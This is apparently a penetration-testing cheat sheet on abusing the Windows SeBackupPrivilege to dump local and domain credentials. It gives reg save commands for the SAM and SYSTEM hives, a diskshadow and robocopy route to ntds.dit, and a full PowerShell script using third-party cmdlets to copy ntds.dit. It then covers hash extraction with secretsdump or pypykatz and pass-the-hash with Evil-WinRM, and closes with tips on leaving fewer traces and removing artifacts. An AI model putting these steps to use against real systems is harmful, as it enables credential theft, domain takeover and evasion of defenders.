SeBackupPrivilege

Overview

  • Grants read access to any file or registry hive regardless of its ACL, but only when the object is opened with backup semantics: reg.exe, robocopy /b and the cmdlet DLLs below do this, a plain copy or type does not

  • Lets a non-administrator save the SAM and SYSTEM hives, and on a domain controller read ntds.dit from a shadow copy (the live ntds.dit is held open by lsass and cannot be copied directly)

  • Held by members of Backup Operators (also Server Operators and Administrators); these tools do not hand out administrator rights, the privilege is what makes the reads work

Check for Privilege

whoami /priv

Look for SeBackupPrivilege in the output. It is usually listed with State "Disabled"; that is still usable, because reg.exe, robocopy and the cmdlets enable the privilege in their own token before opening files.


Windows 10 / Standalone Machine

1. Extract SAM and SYSTEM

cd c:\
mkdir Temp
reg save hklm\sam c:\Temp\sam
reg save hklm\system c:\Temp\system

2. Download Files (Evil-WinRM)

cd Temp
download sam
download system

3. Extract Hashes

Parse both hives offline with pypykatz (the Quick Reference tool for this target): SYSTEM supplies the boot key that decrypts SAM, and the output is one pwdump-style line per local account, with the NT hash in the fourth field.

4. Pass-the-Hash

Authenticate as the local Administrator with the NT hash through Evil-WinRM's hash option (-H); no cracking needed.


Domain Controller

Method 1: Using DiskShadow + RoboCopy

1. Create DSH File (Kali)

A diskshadow script that snapshots the C: volume and exposes the snapshot as a spare drive letter. diskshadow expects CRLF line endings, so convert a file written on Kali with unix2dos before uploading it.

2. Execute Backup (Target)

Run diskshadow with the script, then copy ntds.dit out of the exposed snapshot with robocopy in backup mode (/b); the copy inside the snapshot is not locked by lsass and /b bypasses its ACL. Save the SYSTEM hive with reg save as in the standalone case; it holds the boot key needed to decrypt the DIT.

3. Download Files

Pull ntds.dit and system back with Evil-WinRM's download command.

4. Extract Hashes

Run secretsdump (the Quick Reference tool for this target) in offline mode against ntds.dit plus the SYSTEM hive; it prints every domain account, including krbtgt and the machine accounts.

5. Pass-the-Hash

Authenticate with a domain administrator's NT hash through Evil-WinRM's hash option (-H).


Method 2: Using DLL Files

1. Get DLL Files

Download from: https://github.com/giuliano108/SeBackupPrivilege

  • SeBackupPrivilegeUtils.dll

  • SeBackupPrivilegeCmdLets.dll

2. Upload Files

Push both DLLs to a writable directory on the target with Evil-WinRM's upload command.

3. Import DLLs and Execute

Import-Module both DLLs, enable the privilege in the current token with Set-SeBackupPrivilege, then copy the target file with Copy-FileSeBackupPrivilege. The cmdlets only bypass the file's ACL; they do not get around the lock lsass holds on the live ntds.dit, so point them at the snapshot exposed in Method 1 step 2.

4. Extract & Pass-the-Hash

Same as Method 1 (steps 3-5)
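Step 3 of Method 2 spelled out, as an added example rather than the project's README. The cmdlet names are those exported by the DLLs from the repository linked above. Assumptions: the DLLs were uploaded to C:\Temp, and a shadow copy of C: is already exposed as Z: (Method 1 step 2); the file chosen here is ntds.dit, but the same cmdlet reads any ACL-protected file, which is what makes this method useful outside the DC case as well.

```powershell
# Added example (not the project's README). Use the SeBackupPrivilege cmdlets
# from github.com/giuliano108/SeBackupPrivilege to copy an ACL-protected file.
# Assumptions: DLLs in C:\Temp, shadow copy of C: exposed as Z:.
Set-Location C:\Temp
Import-Module .\SeBackupPrivilegeUtils.dll
Import-Module .\SeBackupPrivilegeCmdLets.dll

# A fresh token normally holds the privilege in the Disabled state; unlike
# reg.exe and robocopy, these cmdlets need it switched on explicitly.
Get-SeBackupPrivilege          # prints the current state
Set-SeBackupPrivilege          # enables it for this process
Get-SeBackupPrivilege          # should now report enabled

# Copy-FileSeBackupPrivilege opens the source with backup semantics, so the
# NTDS directory ACL (which denies non-administrators) is not consulted.
# The snapshot path is used because the live file is locked by lsass.
Copy-FileSeBackupPrivilege Z:\Windows\NTDS\ntds.dit C:\Temp\ntds.dit -Overwrite
if (-not (Test-Path C:\Temp\ntds.dit)) { throw 'Copy failed; check that Z: is exposed' }

# SYSTEM hive for the boot key, as in Method 1.
reg save hklm\system C:\Temp\system /y
```

The DLLs load into the PowerShell process, so a defender looking at the host sees module loads from a user-writable path alongside the file reads; the robocopy route in Method 1 leaves fewer traces. Either way, remove the DLLs and the copied files once they are downloaded.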


Quick Reference

Target              Key Files           Tool
Standalone          SAM + SYSTEM        pypykatz
Domain Controller   ntds.dit + SYSTEM   secretsdump

Connection Tool: Evil-WinRM
Hash Type: NTLM
